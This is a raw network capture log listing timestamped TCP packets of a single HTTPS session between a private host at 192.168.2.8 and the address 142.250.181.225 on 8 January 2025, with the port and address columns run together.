                                                                                                                                          Jan 8, 2025 16:21:18.685560942 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:19.340745926 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:19.340926886 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:19.350558043 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:19.350572109 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:19.350847960 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:19.351013899 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:19.351651907 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:19.395342112 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.691515923 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.691607952 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.697546959 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.697612047 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.710066080 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.710149050 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.710159063 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.710201979 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.716337919 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.716383934 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.781999111 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.782071114 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.782085896 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.782130957 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.782150984 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.782191038 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.782196999 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.782241106 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.782248020 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.782351017 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.787158012 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.787234068 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.787247896 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.787293911 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.793415070 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.793478966 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.793484926 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.793526888 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.799642086 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.799695969 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.799720049 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.799755096 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.805911064 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.805960894 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.806026936 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.806063890 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.812736034 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.812789917 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.812800884 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.812850952 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.818473101 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.818542004 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.818625927 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.818670988 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.824449062 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.824505091 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.824513912 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.824558973 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.830092907 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.830157995 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.830163956 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.830216885 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.835911036 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.835984945 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.836039066 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.836087942 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.841732979 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.841818094 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.850234032 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.850320101 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.850327969 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.850370884 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.872363091 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.872453928 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.872560024 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.872611046 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.872617960 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.872667074 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.872970104 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.873014927 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.873019934 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.873053074 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.873066902 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.873073101 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.873095989 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.873122931 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.873867035 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.873899937 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.873917103 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.873923063 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.873950958 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.873965979 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.878159046 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.878215075 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.878221989 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.878268957 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.883548975 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.883595943 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.883693933 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.883744955 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.888578892 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.888633013 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.888716936 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.888761997 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.893749952 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.893827915 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.893835068 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.893879890 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.898241043 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.898299932 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.898307085 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.898348093 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.902942896 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.902992010 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.902998924 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.903084040 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.907582998 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.907648087 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.907694101 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.907748938 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.912444115 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.912497044 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.912554026 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.912718058 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.916913033 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.917011976 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.917020082 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.917129993 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.921575069 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.921667099 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.921674967 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.921787977 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.925945044 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.926054955 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.926064968 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.926156044 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.930042028 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.930090904 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.930186987 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.930196047 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.930295944 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.934176922 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.934241056 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.934247971 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.934317112 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.938261032 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.938328981 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.938335896 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.938402891 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.941977024 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.942044020 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.942056894 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.942106009 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.945607901 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.945775032 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.945796967 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.945842028 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.949325085 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.949376106 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.949383020 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.949425936 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.952822924 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.952903986 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.952910900 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.952960014 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.956425905 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.956502914 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.964531898 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.964580059 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.964586973 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.964624882 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.964631081 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.964673996 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.964674950 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.964685917 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.964715958 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.964845896 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.965148926 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.965212107 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.965219021 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.965265036 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.966907024 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.966955900 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.966963053 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.967009068 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.968990088 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.969043016 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.969049931 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.969093084 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.971579075 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.971638918 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.971646070 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.971685886 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.973858118 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.973967075 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.973973036 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.974021912 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.977792025 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.977864027 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.977870941 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.977906942 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.977937937 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.977946997 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.977998018 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.978065968 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.979949951 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.980360985 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.980369091 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.980433941 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.982037067 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.982098103 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.982105017 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.982207060 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.984558105 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.984610081 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.984620094 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.984659910 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.986268044 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.986324072 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.986330986 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.986377954 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.989033937 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.989088058 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.989094973 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.989140987 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.990521908 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.990586042 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.990592957 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.990643024 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.993776083 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.993832111 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.993839025 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.993887901 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.995223045 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.995265007 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.995270967 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.995323896 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.998477936 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.998528004 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.998538017 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.998586893 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.999078989 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.999130011 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:21.999135971 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:21.999177933 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.003470898 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.003523111 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.003529072 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.003571987 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.003577948 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.003621101 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.003628016 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.003674030 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.007733107 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.007793903 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.007802010 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.007849932 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.007857084 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.007903099 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.007910967 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.007965088 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.012722969 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.012778997 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.012785912 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.012828112 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.012833118 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.012841940 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.012887955 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.017147064 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.017224073 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.017256975 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.017286062 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.017294884 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.017314911 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.017333031 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.020756006 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.020817995 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.020824909 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.020869970 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.020872116 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.020884037 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.020920038 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.020958900 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.021172047 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.021244049 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.024893045 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.024943113 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.025007963 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.025052071 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.025059938 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.025101900 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.025291920 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.025336981 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.028855085 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.028919935 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.028928995 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.028939009 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.028964043 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.028995037 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.028999090 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.029045105 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.037076950 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.037136078 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.037142992 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.037156105 CET44349710142.250.181.225192.168.2.8
                                                                                                                                          Jan 8, 2025 16:21:22.037182093 CET49710443192.168.2.8142.250.181.225
                                                                                                                                          Jan 8, 2025 16:21:22.037208080 CET49710443192.168.2.8142.250.181.225
